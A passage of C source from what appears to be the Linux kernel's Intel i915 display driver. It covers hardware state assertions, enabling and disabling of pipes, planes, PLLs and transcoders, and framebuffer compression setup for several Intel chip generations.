reg = FDI_RX_CTL(pipe);
val = I915_READ(reg);
WARN(!(val & FDI_RX_PLL_ENABLE), "FDI RX PLL assertion failure, should be active but is disabled\n");
}
static void assert_panel_unlocked(struct drm_i915_private *dev_priv,
enum pipe pipe)
{
int pp_reg, lvds_reg;
u32 val;
enum pipe panel_pipe = PIPE_A;
bool locked = true;
if (HAS_PCH_SPLIT(dev_priv->dev)) {
pp_reg = PCH_PP_CONTROL;
lvds_reg = PCH_LVDS;
} else {
pp_reg = PP_CONTROL;
lvds_reg = LVDS;
}
val = I915_READ(pp_reg);
if (!(val & PANEL_POWER_ON) ||
((val & PANEL_UNLOCK_REGS) == PANEL_UNLOCK_REGS))
locked = false;
if (I915_READ(lvds_reg) & LVDS_PIPEB_SELECT)
panel_pipe = PIPE_B;
WARN(panel_pipe == pipe && locked,
"panel assertion failure, pipe %c regs locked\n",
pipe_name(pipe));
}
static void assert_pipe(struct drm_i915_private *dev_priv,
enum pipe pipe, bool state)
{
int reg;
u32 val;
bool cur_state;
reg = PIPECONF(pipe);
val = I915_READ(reg);
cur_state = !!(val & PIPECONF_ENABLE);
WARN(cur_state != state,
"pipe %c assertion failure (expected %s, current %s)\n",
pipe_name(pipe), state_string(state), state_string(cur_state));
}
#define assert_pipe_enabled(d, p) assert_pipe(d, p, true)
#define assert_pipe_disabled(d, p) assert_pipe(d, p, false)
static void assert_plane_enabled(struct drm_i915_private *dev_priv,
enum plane plane)
{
int reg;
u32 val;
reg = DSPCNTR(plane);
val = I915_READ(reg);
WARN(!(val & DISPLAY_PLANE_ENABLE),
"plane %c assertion failure, should be active but is disabled\n",
plane_name(plane));
}
static void assert_planes_disabled(struct drm_i915_private *dev_priv,
enum pipe pipe)
{
int reg, i;
u32 val;
int cur_pipe;
/* Planes are fixed to pipes on ILK+ */
if (HAS_PCH_SPLIT(dev_priv->dev))
return;
/* Need to check both planes against the pipe */
for (i = 0; i < 2; i++) {
reg = DSPCNTR(i);
val = I915_READ(reg);
cur_pipe = (val & DISPPLANE_SEL_PIPE_MASK) >>
DISPPLANE_SEL_PIPE_SHIFT;
WARN((val & DISPLAY_PLANE_ENABLE) && pipe == cur_pipe,
"plane %c assertion failure, should be off on pipe %c but is still active\n",
plane_name(i), pipe_name(pipe));
}
}
static void assert_pch_refclk_enabled(struct drm_i915_private *dev_priv)
{
u32 val;
bool enabled;
val = I915_READ(PCH_DREF_CONTROL);
enabled = !!(val & (DREF_SSC_SOURCE_MASK | DREF_NONSPREAD_SOURCE_MASK |
DREF_SUPERSPREAD_SOURCE_MASK));
WARN(!enabled, "PCH refclk assertion failure, should be active but is disabled\n");
}
static void assert_transcoder_disabled(struct drm_i915_private *dev_priv,
enum pipe pipe)
{
int reg;
u32 val;
bool enabled;
reg = TRANSCONF(pipe);
val = I915_READ(reg);
enabled = !!(val & TRANS_ENABLE);
WARN(enabled,
"transcoder assertion failed, should be off on pipe %c but is still active\n",
pipe_name(pipe));
}
static bool dp_pipe_enabled(struct drm_i915_private *dev_priv,
enum pipe pipe, u32 port_sel, u32 val)
{
if ((val & DP_PORT_EN) == 0)
return false;
if (HAS_PCH_CPT(dev_priv->dev)) {
u32 trans_dp_ctl_reg = TRANS_DP_CTL(pipe);
u32 trans_dp_ctl = I915_READ(trans_dp_ctl_reg);
if ((trans_dp_ctl & TRANS_DP_PORT_SEL_MASK) != port_sel)
return false;
} else {
if ((val & DP_PIPE_MASK) != (pipe << 30))
return false;
}
return true;
}
static bool hdmi_pipe_enabled(struct drm_i915_private *dev_priv,
enum pipe pipe, u32 val)
{
if ((val & PORT_ENABLE) == 0)
return false;
if (HAS_PCH_CPT(dev_priv->dev)) {
if ((val & PORT_TRANS_SEL_MASK) != PORT_TRANS_SEL_CPT(pipe))
return false;
} else {
if ((val & TRANSCODER_MASK) != TRANSCODER(pipe))
return false;
}
return true;
}
static bool lvds_pipe_enabled(struct drm_i915_private *dev_priv,
enum pipe pipe, u32 val)
{
if ((val & LVDS_PORT_EN) == 0)
return false;
if (HAS_PCH_CPT(dev_priv->dev)) {
if ((val & PORT_TRANS_SEL_MASK) != PORT_TRANS_SEL_CPT(pipe))
return false;
} else {
if ((val & LVDS_PIPE_MASK) != LVDS_PIPE(pipe))
return false;
}
return true;
}
static bool adpa_pipe_enabled(struct drm_i915_private *dev_priv,
enum pipe pipe, u32 val)
{
if ((val & ADPA_DAC_ENABLE) == 0)
return false;
if (HAS_PCH_CPT(dev_priv->dev)) {
if ((val & PORT_TRANS_SEL_MASK) != PORT_TRANS_SEL_CPT(pipe))
return false;
} else {
if ((val & ADPA_PIPE_SELECT_MASK) != ADPA_PIPE_SELECT(pipe))
return false;
}
return true;
}
static void assert_pch_dp_disabled(struct drm_i915_private *dev_priv,
enum pipe pipe, int reg, u32 port_sel)
{
u32 val = I915_READ(reg);
WARN(dp_pipe_enabled(dev_priv, pipe, port_sel, val),
"PCH DP (0x%08x) enabled on transcoder %c, should be disabled\n",
reg, pipe_name(pipe));
}
static void assert_pch_hdmi_disabled(struct drm_i915_private *dev_priv,
enum pipe pipe, int reg)
{
u32 val = I915_READ(reg);
WARN(hdmi_pipe_enabled(dev_priv, val, pipe),
"PCH DP (0x%08x) enabled on transcoder %c, should be disabled\n",
reg, pipe_name(pipe));
}
static void assert_pch_ports_disabled(struct drm_i915_private *dev_priv,
enum pipe pipe)
{
int reg;
u32 val;
assert_pch_dp_disabled(dev_priv, pipe, PCH_DP_B, TRANS_DP_PORT_SEL_B);
assert_pch_dp_disabled(dev_priv, pipe, PCH_DP_C, TRANS_DP_PORT_SEL_C);
assert_pch_dp_disabled(dev_priv, pipe, PCH_DP_D, TRANS_DP_PORT_SEL_D);
reg = PCH_ADPA;
val = I915_READ(reg);
WARN(adpa_pipe_enabled(dev_priv, val, pipe),
"PCH VGA enabled on transcoder %c, should be disabled\n",
pipe_name(pipe));
reg = PCH_LVDS;
val = I915_READ(reg);
WARN(lvds_pipe_enabled(dev_priv, val, pipe),
"PCH LVDS enabled on transcoder %c, should be disabled\n",
pipe_name(pipe));
assert_pch_hdmi_disabled(dev_priv, pipe, HDMIB);
assert_pch_hdmi_disabled(dev_priv, pipe, HDMIC);
assert_pch_hdmi_disabled(dev_priv, pipe, HDMID);
}
/**
* intel_enable_pll - enable a PLL
* @dev_priv: i915 private structure
* @pipe: pipe PLL to enable
*
* Enable @pipe's PLL so we can start pumping pixels from a plane. Check to
* make sure the PLL reg is writable first though, since the panel write
* protect mechanism may be enabled.
*
* Note! This is for pre-ILK only.
*/
static void intel_enable_pll(struct drm_i915_private *dev_priv, enum pipe pipe)
{
int reg;
u32 val;
/* No really, not for ILK+ */
BUG_ON(dev_priv->info->gen >= 5);
/* PLL is protected by panel, make sure we can write it */
if (IS_MOBILE(dev_priv->dev) && !IS_I830(dev_priv->dev))
assert_panel_unlocked(dev_priv, pipe);
reg = DPLL(pipe);
val = I915_READ(reg);
val |= DPLL_VCO_ENABLE;
/* We do this three times for luck */
I915_WRITE(reg, val);
POSTING_READ(reg);
udelay(150); /* wait for warmup */
I915_WRITE(reg, val);
POSTING_READ(reg);
udelay(150); /* wait for warmup */
I915_WRITE(reg, val);
POSTING_READ(reg);
udelay(150); /* wait for warmup */
}
/**
* intel_disable_pll - disable a PLL
* @dev_priv: i915 private structure
* @pipe: pipe PLL to disable
*
* Disable the PLL for @pipe, making sure the pipe is off first.
*
* Note! This is for pre-ILK only.
*/
static void intel_disable_pll(struct drm_i915_private *dev_priv, enum pipe pipe)
{
int reg;
u32 val;
/* Don't disable pipe A or pipe A PLLs if needed */
if (pipe == PIPE_A && (dev_priv->quirks & QUIRK_PIPEA_FORCE))
return;
/* Make sure the pipe isn't still relying on us */
assert_pipe_disabled(dev_priv, pipe);
reg = DPLL(pipe);
val = I915_READ(reg);
val &= ~DPLL_VCO_ENABLE;
I915_WRITE(reg, val);
POSTING_READ(reg);
}
/**
* intel_enable_pch_pll - enable PCH PLL
* @dev_priv: i915 private structure
* @pipe: pipe PLL to enable
*
* The PCH PLL needs to be enabled before the PCH transcoder, since it
* drives the transcoder clock.
*/
static void intel_enable_pch_pll(struct drm_i915_private *dev_priv,
enum pipe pipe)
{
int reg;
u32 val;
/* PCH only available on ILK+ */
BUG_ON(dev_priv->info->gen < 5);
/* PCH refclock must be enabled first */
assert_pch_refclk_enabled(dev_priv);
reg = PCH_DPLL(pipe);
val = I915_READ(reg);
val |= DPLL_VCO_ENABLE;
I915_WRITE(reg, val);
POSTING_READ(reg);
udelay(200);
}
static void intel_disable_pch_pll(struct drm_i915_private *dev_priv,
enum pipe pipe)
{
int reg;
u32 val;
/* PCH only available on ILK+ */
BUG_ON(dev_priv->info->gen < 5);
/* Make sure transcoder isn't still depending on us */
assert_transcoder_disabled(dev_priv, pipe);
reg = PCH_DPLL(pipe);
val = I915_READ(reg);
val &= ~DPLL_VCO_ENABLE;
I915_WRITE(reg, val);
POSTING_READ(reg);
udelay(200);
}
static void intel_enable_transcoder(struct drm_i915_private *dev_priv,
enum pipe pipe)
{
int reg;
u32 val;
/* PCH only available on ILK+ */
BUG_ON(dev_priv->info->gen < 5);
/* Make sure PCH DPLL is enabled */
assert_pch_pll_enabled(dev_priv, pipe);
/* FDI must be feeding us bits for PCH ports */
assert_fdi_tx_enabled(dev_priv, pipe);
assert_fdi_rx_enabled(dev_priv, pipe);
reg = TRANSCONF(pipe);
val = I915_READ(reg);
if (HAS_PCH_IBX(dev_priv->dev)) {
/*
* make the BPC in transcoder be consistent with
* that in pipeconf reg.
*/
val &= ~PIPE_BPC_MASK;
val |= I915_READ(PIPECONF(pipe)) & PIPE_BPC_MASK;
}
I915_WRITE(reg, val | TRANS_ENABLE);
if (wait_for(I915_READ(reg) & TRANS_STATE_ENABLE, 100))
DRM_ERROR("failed to enable transcoder %d\n", pipe);
}
static void intel_disable_transcoder(struct drm_i915_private *dev_priv,
enum pipe pipe)
{
int reg;
u32 val;
/* FDI relies on the transcoder */
assert_fdi_tx_disabled(dev_priv, pipe);
assert_fdi_rx_disabled(dev_priv, pipe);
/* Ports must be off as well */
assert_pch_ports_disabled(dev_priv, pipe);
reg = TRANSCONF(pipe);
val = I915_READ(reg);
val &= ~TRANS_ENABLE;
I915_WRITE(reg, val);
/* wait for PCH transcoder off, transcoder state */
if (wait_for((I915_READ(reg) & TRANS_STATE_ENABLE) == 0, 50))
DRM_ERROR("failed to disable transcoder\n");
}
/**
* intel_enable_pipe - enable a pipe, asserting requirements
* @dev_priv: i915 private structure
* @pipe: pipe to enable
* @pch_port: on ILK+, is this pipe driving a PCH port or not
*
* Enable @pipe, making sure that various hardware specific requirements
* are met, if applicable, e.g. PLL enabled, LVDS pairs enabled, etc.
*
* @pipe should be %PIPE_A or %PIPE_B.
*
* Will wait until the pipe is actually running (i.e. first vblank) before
* returning.
*/
static void intel_enable_pipe(struct drm_i915_private *dev_priv, enum pipe pipe,
bool pch_port)
{
int reg;
u32 val;
/*
* A pipe without a PLL won't actually be able to drive bits from
* a plane. On ILK+ the pipe PLLs are integrated, so we don't
* need the check.
*/
if (!HAS_PCH_SPLIT(dev_priv->dev))
assert_pll_enabled(dev_priv, pipe);
else {
if (pch_port) {
/* if driving the PCH, we need FDI enabled */
assert_fdi_rx_pll_enabled(dev_priv, pipe);
assert_fdi_tx_pll_enabled(dev_priv, pipe);
}
/* FIXME: assert CPU port conditions for SNB+ */
}
reg = PIPECONF(pipe);
val = I915_READ(reg);
if (val & PIPECONF_ENABLE)
return;
I915_WRITE(reg, val | PIPECONF_ENABLE);
intel_wait_for_vblank(dev_priv->dev, pipe);
}
/**
* intel_disable_pipe - disable a pipe, asserting requirements
* @dev_priv: i915 private structure
* @pipe: pipe to disable
*
* Disable @pipe, making sure that various hardware specific requirements
* are met, if applicable, e.g. plane disabled, panel fitter off, etc.
*
* @pipe should be %PIPE_A or %PIPE_B.
*
* Will wait until the pipe has shut down before returning.
*/
static void intel_disable_pipe(struct drm_i915_private *dev_priv,
enum pipe pipe)
{
int reg;
u32 val;
/*
* Make sure planes won't keep trying to pump pixels to us,
* or we might hang the display.
*/
assert_planes_disabled(dev_priv, pipe);
/* Don't disable pipe A or pipe A PLLs if needed */
if (pipe == PIPE_A && (dev_priv->quirks & QUIRK_PIPEA_FORCE))
return;
reg = PIPECONF(pipe);
val = I915_READ(reg);
if ((val & PIPECONF_ENABLE) == 0)
return;
I915_WRITE(reg, val & ~PIPECONF_ENABLE);
intel_wait_for_pipe_off(dev_priv->dev, pipe);
}
/*
* Plane regs are double buffered, going from enabled->disabled needs a
* trigger in order to latch. The display address reg provides this.
*/
static void intel_flush_display_plane(struct drm_i915_private *dev_priv,
enum plane plane)
{
I915_WRITE(DSPADDR(plane), I915_READ(DSPADDR(plane)));
I915_WRITE(DSPSURF(plane), I915_READ(DSPSURF(plane)));
}
/**
* intel_enable_plane - enable a display plane on a given pipe
* @dev_priv: i915 private structure
* @plane: plane to enable
* @pipe: pipe being fed
*
* Enable @plane on @pipe, making sure that @pipe is running first.
*/
static void intel_enable_plane(struct drm_i915_private *dev_priv,
enum plane plane, enum pipe pipe)
{
int reg;
u32 val;
/* If the pipe isn't enabled, we can't pump pixels and may hang */
assert_pipe_enabled(dev_priv, pipe);
reg = DSPCNTR(plane);
val = I915_READ(reg);
if (val & DISPLAY_PLANE_ENABLE)
return;
I915_WRITE(reg, val | DISPLAY_PLANE_ENABLE);
intel_flush_display_plane(dev_priv, plane);
intel_wait_for_vblank(dev_priv->dev, pipe);
}
/**
* intel_disable_plane - disable a display plane
* @dev_priv: i915 private structure
* @plane: plane to disable
* @pipe: pipe consuming the data
*
* Disable @plane; should be an independent operation.
*/
static void intel_disable_plane(struct drm_i915_private *dev_priv,
enum plane plane, enum pipe pipe)
{
int reg;
u32 val;
reg = DSPCNTR(plane);
val = I915_READ(reg);
if ((val & DISPLAY_PLANE_ENABLE) == 0)
return;
I915_WRITE(reg, val & ~DISPLAY_PLANE_ENABLE);
intel_flush_display_plane(dev_priv, plane);
intel_wait_for_vblank(dev_priv->dev, pipe);
}
static void disable_pch_dp(struct drm_i915_private *dev_priv,
enum pipe pipe, int reg, u32 port_sel)
{
u32 val = I915_READ(reg);
if (dp_pipe_enabled(dev_priv, pipe, port_sel, val)) {
DRM_DEBUG_KMS("Disabling pch dp %x on pipe %d\n", reg, pipe);
I915_WRITE(reg, val & ~DP_PORT_EN);
}
}
static void disable_pch_hdmi(struct drm_i915_private *dev_priv,
enum pipe pipe, int reg)
{
u32 val = I915_READ(reg);
if (hdmi_pipe_enabled(dev_priv, val, pipe)) {
DRM_DEBUG_KMS("Disabling pch HDMI %x on pipe %d\n",
reg, pipe);
I915_WRITE(reg, val & ~PORT_ENABLE);
}
}
/* Disable any ports connected to this transcoder */
static void intel_disable_pch_ports(struct drm_i915_private *dev_priv,
enum pipe pipe)
{
u32 reg, val;
val = I915_READ(PCH_PP_CONTROL);
I915_WRITE(PCH_PP_CONTROL, val | PANEL_UNLOCK_REGS);
disable_pch_dp(dev_priv, pipe, PCH_DP_B, TRANS_DP_PORT_SEL_B);
disable_pch_dp(dev_priv, pipe, PCH_DP_C, TRANS_DP_PORT_SEL_C);
disable_pch_dp(dev_priv, pipe, PCH_DP_D, TRANS_DP_PORT_SEL_D);
reg = PCH_ADPA;
val = I915_READ(reg);
if (adpa_pipe_enabled(dev_priv, val, pipe))
I915_WRITE(reg, val & ~ADPA_DAC_ENABLE);
reg = PCH_LVDS;
val = I915_READ(reg);
if (lvds_pipe_enabled(dev_priv, val, pipe)) {
DRM_DEBUG_KMS("disable lvds on pipe %d val 0x%08x\n", pipe, val);
I915_WRITE(reg, val & ~LVDS_PORT_EN);
POSTING_READ(reg);
udelay(100);
}
disable_pch_hdmi(dev_priv, pipe, HDMIB);
disable_pch_hdmi(dev_priv, pipe, HDMIC);
disable_pch_hdmi(dev_priv, pipe, HDMID);
}
static void i8xx_disable_fbc(struct drm_device *dev)
{
struct drm_i915_private *dev_priv = dev->dev_private;
u32 fbc_ctl;
/* Disable compression */
fbc_ctl = I915_READ(FBC_CONTROL);
if ((fbc_ctl & FBC_CTL_EN) == 0)
return;
fbc_ctl &= ~FBC_CTL_EN;
I915_WRITE(FBC_CONTROL, fbc_ctl);
/* Wait for compressing bit to clear */
if (wait_for((I915_READ(FBC_STATUS) & FBC_STAT_COMPRESSING) == 0, 10)) {
DRM_DEBUG_KMS("FBC idle timed out\n");
return;
}
DRM_DEBUG_KMS("disabled FBC\n");
}
static void i8xx_enable_fbc(struct drm_crtc *crtc, unsigned long interval)
{
struct drm_device *dev = crtc->dev;
struct drm_i915_private *dev_priv = dev->dev_private;
struct drm_framebuffer *fb = crtc->fb;
struct intel_framebuffer *intel_fb = to_intel_framebuffer(fb);
struct drm_i915_gem_object *obj = intel_fb->obj;
struct intel_crtc *intel_crtc = to_intel_crtc(crtc);
int cfb_pitch;
int plane, i;
u32 fbc_ctl, fbc_ctl2;
cfb_pitch = dev_priv->cfb_size / FBC_LL_SIZE;
if (fb->pitch < cfb_pitch)
cfb_pitch = fb->pitch;
/* FBC_CTL wants 64B units */
cfb_pitch = (cfb_pitch / 64) - 1;
plane = intel_crtc->plane == 0 ? FBC_CTL_PLANEA : FBC_CTL_PLANEB;
/* Clear old tags */
for (i = 0; i < (FBC_LL_SIZE / 32) + 1; i++)
I915_WRITE(FBC_TAG + (i * 4), 0);
/* Set it up... */
fbc_ctl2 = FBC_CTL_FENCE_DBL | FBC_CTL_IDLE_IMM | FBC_CTL_CPU_FENCE;
fbc_ctl2 |= plane;
I915_WRITE(FBC_CONTROL2, fbc_ctl2);
I915_WRITE(FBC_FENCE_OFF, crtc->y);
/* enable it... */
fbc_ctl = FBC_CTL_EN | FBC_CTL_PERIODIC;
if (IS_I945GM(dev))
fbc_ctl |= FBC_CTL_C3_IDLE; /* 945 needs special SR handling */
fbc_ctl |= (cfb_pitch & 0xff) << FBC_CTL_STRIDE_SHIFT;
fbc_ctl |= (interval & 0x2fff) << FBC_CTL_INTERVAL_SHIFT;
fbc_ctl |= obj->fence_reg;
I915_WRITE(FBC_CONTROL, fbc_ctl);
DRM_DEBUG_KMS("enabled FBC, pitch %d, yoff %d, plane %d, ",
cfb_pitch, crtc->y, intel_crtc->plane);
}
static bool i8xx_fbc_enabled(struct drm_device *dev)
{
struct drm_i915_private *dev_priv = dev->dev_private;
return I915_READ(FBC_CONTROL) & FBC_CTL_EN;
}
static void g4x_enable_fbc(struct drm_crtc *crtc, unsigned long interval)
{
struct drm_device *dev = crtc->dev;
struct drm_i915_private *dev_priv = dev->dev_private;
struct drm_framebuffer *fb = crtc->fb;
struct intel_framebuffer *intel_fb = to_intel_framebuffer(fb);
struct drm_i915_gem_object *obj = intel_fb->obj;
struct intel_crtc *intel_crtc = to_intel_crtc(crtc);
int plane = intel_crtc->plane == 0 ? DPFC_CTL_PLANEA : DPFC_CTL_PLANEB;
unsigned long stall_watermark = 200;
u32 dpfc_ctl;
dpfc_ctl = plane | DPFC_SR_EN | DPFC_CTL_LIMIT_1X;
dpfc_ctl |= DPFC_CTL_FENCE_EN | obj->fence_reg;
I915_WRITE(DPFC_CHICKEN, DPFC_HT_MODIFY);
I915_WRITE(DPFC_RECOMP_CTL, DPFC_RECOMP_STALL_EN |
(stall_watermark << DPFC_RECOMP_STALL_WM_SHIFT) |
(interval << DPFC_RECOMP_TIMER_COUNT_SHIFT));
I915_WRITE(DPFC_FENCE_YOFF, crtc->y);
/* enable it... */
I915_WRITE(DPFC_CONTROL, I915_READ(DPFC_CONTROL) | DPFC_CTL_EN);
DRM_DEBUG_KMS("enabled fbc on plane %d\n", intel_crtc->plane);
}
static void g4x_disable_fbc(struct drm_device *dev)
{
struct drm_i915_private *dev_priv = dev->dev_private;
u32 dpfc_ctl;
/* Disable compression */
dpfc_ctl = I915_READ(DPFC_CONTROL);
if (dpfc_ctl & DPFC_CTL_EN) {
dpfc_ctl &= ~DPFC_CTL_EN;
I915_WRITE(DPFC_CONTROL, dpfc_ctl);
DRM_DEBUG_KMS("disabled FBC\n");
}
}
static bool g4x_fbc_enabled(struct drm_device *dev)
{
struct drm_i915_private *dev_priv = dev->dev_private;
return I915_READ(DPFC_CONTROL) & DPFC_CTL_EN;
}
static void sandybridge_blit_fbc_update(struct drm_device *dev)
{
struct drm_i915_private *dev_priv = dev->dev_private;
u32 blt_ecoskpd;
/* Make sure blitter notifies FBC of writes */
gen6_gt_force_wake_get(dev_priv);
blt_ecoskpd = I915_READ(GEN6_BLITTER_ECOSKPD);
blt_ecoskpd |= GEN6_BLITTER_FBC_NOTIFY <<
GEN6_BLITTER_LOCK_SHIFT;
I915_WRITE(GEN6_BLITTER_ECOSKPD, blt_ecoskpd);
blt_ecoskpd |= GEN6_BLITTER_FBC_NOTIFY;
I915_WRITE(GEN6_BLITTER_ECOSKPD, blt_ecoskpd);
blt_ecoskpd &= ~(GEN6_BLITTER_FBC_NOTIFY <<
GEN6_BLITTER_LOCK_SHIFT);
I915_WRITE(GEN6_BLITTER_ECOSKPD, blt_ecoskpd);
POSTING_READ(GEN6_BLITTER_ECOSKPD);
gen6_gt_force_wake_put(dev_priv);
}
static void ironlake_enable_fbc(struct drm_crtc *crtc, unsigned long interval)
{
struct drm_device *dev = crtc->dev;
struct drm_i915_private *dev_priv = dev->dev_private;
struct drm_framebuffer *fb = crtc->fb;
struct intel_framebuffer *intel_fb = to_intel_framebuffer(fb);
struct drm_i915_gem_object *obj = intel_fb->obj;
struct intel_crtc *intel_crtc = to_intel_crtc(crtc);
int plane = intel_crtc->plane == 0 ? DPFC_CTL_PLANEA : DPFC_CTL_PLANEB;
unsigned long stall_watermark = 200;
u32 dpfc_ctl;
dpfc_ctl = I915_READ(ILK_DPFC_CONTROL);
dpfc_ctl &= DPFC_RESERVED;
dpfc_ctl |= (plane | DPFC_CTL_LIMIT_1X);
/* Set persistent mode for front-buffer rendering, ala X. */
dpfc_ctl |= DPFC_CTL_PERSISTENT_MODE;
dpfc_ctl |= (DPFC_CTL_FENCE_EN | obj->fence_reg);
I915_WRITE(ILK_DPFC_CHICKEN, DPFC_HT_MODIFY);
I915_WRITE(ILK_DPFC_RECOMP_CTL, DPFC_RECOMP_STALL_EN |
(stall_watermark << DPFC_RECOMP_STALL_WM_SHIFT) |
(interval << DPFC_RECOMP_TIMER_COUNT_SHIFT));
I915_WRITE(ILK_DPFC_FENCE_YOFF, crtc->y);
I915_WRITE(ILK_FBC_RT_BASE, obj->gtt_offset | ILK_FBC_RT_VALID);
/* enable it... */
I915_WRITE(ILK_DPFC_CONTROL, dpfc_ctl | DPFC_CTL_EN);
if (IS_GEN6(dev)) {
I915_WRITE(SNB_DPFC_CTL_SA,
SNB_CPU_FENCE_ENABLE | obj->fence_reg);
I915_WRITE(DPFC_CPU_FENCE_OFFSET, crtc->y);
sandybridge_blit_fbc_update(dev);
}
DRM_DEBUG_KMS("enabled fbc on plane %d\n", intel_crtc->plane);
}
static void ironlake_disable_fbc(struct drm_device *dev)
{
struct drm_i915_private *dev_priv = dev->dev_private;
u32 dpfc_ctl;
/* Disable compression */
dpfc_ctl = I915_READ(ILK_DPFC_CONTROL);
if (dpfc_ctl & DPFC_CTL_EN) {
dpfc_ctl &= ~DPFC_CTL_EN;
I915_WRITE(ILK_DPFC_CONTROL, dpfc_ctl);
DRM_DEBUG_KMS("disabled FBC\n");
}
}
static bool ironlake_fbc_enabled(struct drm_device *dev)
{
struct drm_i915_private *dev_priv = dev->dev_private;
return I915_READ(ILK_DPFC_CONTROL) & DPFC_CTL_EN;
}
bool intel_fbc_enabled(struct drm_device *dev)
{
struct drm_i915_private *dev_priv = dev->dev_private;
if (!dev_priv->display.fbc_enabled)
return false;
return dev_priv->display.fbc_enabled(dev);
}
static void intel_fbc_work_fn(struct work_struct *__work)
{
struct intel_fbc_work *work =
container_of(to_delayed_work(__work),
struct intel_fbc_work, work);
struct drm_device *dev = work->crtc->dev;
struct drm_i915_private *dev_priv = dev->dev_private;
mutex_lock(&dev->struct_mutex);
if (work == dev_priv->fbc_work) {
/* Double check that we haven't switched fb without cancelling
* the prior work.
*/
if (work->crtc->fb == work->fb) {
dev_priv->display.enable_fbc(work->crtc,
work->interval);
dev_priv->cfb_plane = to_intel_crtc(work->crtc)->plane;
dev_priv->cfb_fb = work->crtc->fb->base.id;
dev_priv->cfb_y = work->crtc->y;
}
dev_priv->fbc_work = NULL;
}
mutex_unlock(&dev->struct_mutex);
kfree(work);
}
static void intel_cancel_fbc_work(struct drm_i915_private *dev_priv)
{
if (dev_priv->fbc_work == NULL)
return;
DRM_DEBUG_KMS("cancelling pending FBC enable\n");
/* Synchronisation is provided by struct_mutex and checking of
* dev_priv->fbc_work, so we can perform the cancellation
* entirely asynchronously.
*/
if (cancel_delayed_work(&dev_priv->fbc_work->work))
/* tasklet was killed before being run, clean up */
kfree(dev_priv->fbc_work);
/* Mark the work as no longer wanted so that if it does
* wake-up (because the work was already running and waiting
* for our mutex), it will discover that is no longer
* necessary to run.
*/
dev_priv->fbc_work = NULL;
}
static void intel_enable_fbc(struct drm_crtc *crtc, unsigned long interval)
{
struct intel_fbc_work *work;
struct drm_device *dev = crtc->dev;
struct drm_i915_private *dev_priv = dev->dev_private;
if (!dev_priv->display.enable_fbc)
return;
intel_cancel_fbc_work(dev_priv);
work = kzalloc(sizeof *work, GFP_KERNEL);
if (work == NULL) {
dev_priv->display.enable_fbc(crtc, interval);
return;
}
work->crtc = crtc;
work->fb = crtc->fb;
work->interval = interval;
INIT_DELAYED_WORK(&work->work, intel_fbc_work_fn);
dev_priv->fbc_work = work;
DRM_DEBUG_KMS("scheduling delayed FBC enable\n");
/* Delay the actual enabling to let pageflipping cease and the
* display to settle before starting the compression. Note that
* this delay also serves a second purpose: it allows for a
* vblank to pass after disabling the FBC before we attempt
* to modify the control registers.
*
* A more complicated solution would involve tracking vblanks
* following the termination of the page-flipping sequence
* and indeed performing the enable as a co-routine and not
* waiting synchronously upon the vblank.
*/
schedule_delayed_work(&work->work, msecs_to_jiffies(50));
}
void intel_disable_fbc(struct drm_device *dev)
{
struct drm_i915_private *dev_priv = dev->dev_private;
intel_cancel_fbc_work(dev_priv);
if (!dev_priv->display.disable_fbc)
return;
dev_priv->display.disable_fbc(dev);
dev_priv->cfb_plane = -1;
}
/**
* intel_update_fbc - enable/disable FBC as needed
* @dev: the drm_device
*
* Set up the framebuffer compression hardware at mode set time. We
* enable it if possible:
* - plane A only (on pre-965)
* - no pixel mulitply/line duplication
* - no alpha buffer discard
* - no dual wide
* - framebuffer <= 2048 in width, 1536 in height
*
* We can't assume that any compression will take place (worst case),
* so the compressed buffer has to be the same size as the uncompressed
* one. It also must reside (along with the line length buffer) in
* stolen memory.
*
* We need to enable/disable FBC on a global basis.
*/
static void intel_update_fbc(struct drm_device *dev)
{
struct drm_i915_private *dev_priv = dev->dev_private;
struct drm_crtc *crtc = NULL, *tmp_crtc;
struct intel_crtc *intel_crtc;
struct drm_framebuffer *fb;
struct intel_framebuffer *intel_fb;
struct drm_i915_gem_object *obj;
int enable_fbc;
DRM_DEBUG_KMS("\n");
if (!i915_powersave)
return;
if (!I915_HAS_FBC(dev))
return;
/*
* If FBC is already on, we just have to verify that we can
* keep it that way...
* Need to disable if:
* - more than one pipe is active
* - changing FBC params (stride, fence, mode)
* - new fb is too large to fit in compressed buffer
* - going to an unsupported config (interlace, pixel multiply, etc.)
*/
list_for_each_entry(tmp_crtc, &dev->mode_config.crtc_list, head) {
if (tmp_crtc->enabled && tmp_crtc->fb) {
if (crtc) {
DRM_DEBUG_KMS("more than one pipe active, disabling compression\n");
dev_priv->no_fbc_reason = FBC_MULTIPLE_PIPES;
goto out_disable;
}
crtc = tmp_crtc;
}
}
if (!crtc || crtc->fb == NULL) {
DRM_DEBUG_KMS("no output, disabling\n");
dev_priv->no_fbc_reason = FBC_NO_OUTPUT;
goto out_disable;
}
intel_crtc = to_intel_crtc(crtc);
fb = crtc->fb;
intel_fb = to_intel_framebuffer(fb);
obj = intel_fb->obj;
enable_fbc = i915_enable_fbc;
if (enable_fbc < 0) {
DRM_DEBUG_KMS("fbc set to per-chip default\n");
enable_fbc = 1;
if (INTEL_INFO(dev)->gen <= 5)
enable_fbc = 0;
}
if (!enable_fbc) {
DRM_DEBUG_KMS("fbc disabled per module param\n");
dev_priv->no_fbc_reason = FBC_MODULE_PARAM;
goto out_disable;
}
if (intel_fb->obj->base.size > dev_priv->cfb_size) {
DRM_DEBUG_KMS("framebuffer too large, disabling "
"compression\n");
dev_priv->no_fbc_reason = FBC_STOLEN_TOO_SMALL;
goto out_disable;
}
if ((crtc->mode.flags & DRM_MODE_FLAG_INTERLACE) ||
(crtc->mode.flags & DRM_MODE_FLAG_DBLSCAN)) {
DRM_DEBUG_KMS("mode incompatible with compression, "
"disabling\n");
dev_priv->no_fbc_reason = FBC_UNSUPPORTED_MODE;
goto out_disable;
}
if ((crtc->mode.hdisplay > 2048) ||
(crtc->mode.vdisplay > 1536)) {
DRM_DEBUG_KMS("mode too large for compression, disabling\n");
dev_priv->no_fbc_reason = FBC_MODE_TOO_LARGE;
goto out_disable;
}
if ((IS_I915GM(dev) || IS_I945GM(dev)) && intel_crtc->plane != 0) {
DRM_DEBUG_KMS("plane not 0, disabling compression\n");
dev_priv->no_fbc_reason = FBC_BAD_PLANE;
goto out_disable;
}
/* The use of a CPU fence is mandatory in order to detect writes
* by the CPU to the scanout and trigger updates to the FBC.
*/
if (obj->tiling_mode != I915_TILING_X ||
obj->fence_reg == I915_FENCE_REG_NONE) {
DRM_DEBUG_KMS("framebuffer not tiled or fenced, disabling compression\n");
dev_priv->no_fbc_reason = FBC_NOT_TILED;
goto out_disable;
}
